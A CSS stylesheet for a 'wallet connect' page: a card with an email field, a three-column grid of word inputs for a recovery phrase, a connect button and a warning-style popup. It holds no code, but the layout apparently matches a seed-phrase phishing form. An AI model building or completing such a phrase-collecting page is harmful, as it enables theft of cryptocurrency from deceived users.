/* RESET */
.twc-page * {
  box-sizing: border-box;
  font-family: "Segoe UI", sans-serif;
}

/* PAGE */
.twc-page {
  min-height: 100vh;
  background: #245aa6;
  padding: 30px;
}

/* LOGO */
.twc-logo img {
  height: 90px;
}

/* CARD */
.twc-card {
  background: #cfeefa;
  padding: 30px;
  border-radius: 16px;
  max-width: 800px;
  margin: auto;
}

/* HEADER */
.twc-header {
  display: flex;
  justify-content: center;
  gap: 10px;
  margin-bottom: 20px;
}

.walletConnect {
  float: right;
  width: 80px;
}

/* INPUTS */
.twc-label-email {
  color: #137ae8;
  margin-top: 15px;
  display: block;
}

.twc-input {
  width: 100%;
  padding: 14px;
  border-radius: 6px;
  border: none;
}

/* PHRASE */
.twc-phrase-box {
  background: #9ec7f3;
  padding: 20px;
  border-radius: 12px;
  display: grid;
  grid-template-columns: repeat(3, 1fr);
  gap: 10px;
}

.twc-word-input {
  padding: 10px;
  border-radius: 4px;
  border: none;
}

/* BUTTON */
.twc-connect-btn {
  width: 100%;
  margin-top: 20px;
  padding: 14px;
  border-radius: 30px;
  border: none;
  background: #2f7dd3;
  color: white;
  font-size: 18px;
  cursor: pointer;
}



.twc-modal-overlay {
  position: fixed !important;
  inset: 0;
  background: rgba(0, 0, 0, 0.65);
  display: flex;
  align-items: center;
  justify-content: center;
  z-index: 2147483647;
}

.twc-modal-box {
  background: #ffffff;
  width: 90%;
  max-width: 420px;
  padding: 28px;
  border-radius: 14px;
  text-align: center;
  animation: modalIn 0.25s ease-out forwards;
}

/* Close animation */
.twc-modal-overlay.closing .twc-modal-box {
  animation: modalOut 0.2s ease-in forwards;
}

/* Content */
.twc-popup-icon {
  font-size: 40px;
  color: red;
  margin-bottom: 10px;
}

.twc-popup-title {
  font-size: 22px;
  margin-bottom: 8px;
  color: #222;
}

.twc-popup-text {
  font-size: 14px;
  line-height: 1.5;
  color: #555;
}

.twc-popup-btn {
  margin-top: 18px;
  padding: 10px 28px;
  border-radius: 30px;
  border: none;
  background: #2f7dd3;
  color: #fff;
  font-size: 16px;
  cursor: pointer;
}

/* Animations */
@keyframes modalIn {
  from {
    transform: scale(0.9);
    opacity: 0;
  }
  to {
    transform: scale(1);
    opacity: 1;
  }
}

@keyframes modalOut {
  from {
    transform: scale(1);
    opacity: 1;
  }
  to {
    transform: scale(0.9);
    opacity: 0;
  }
}
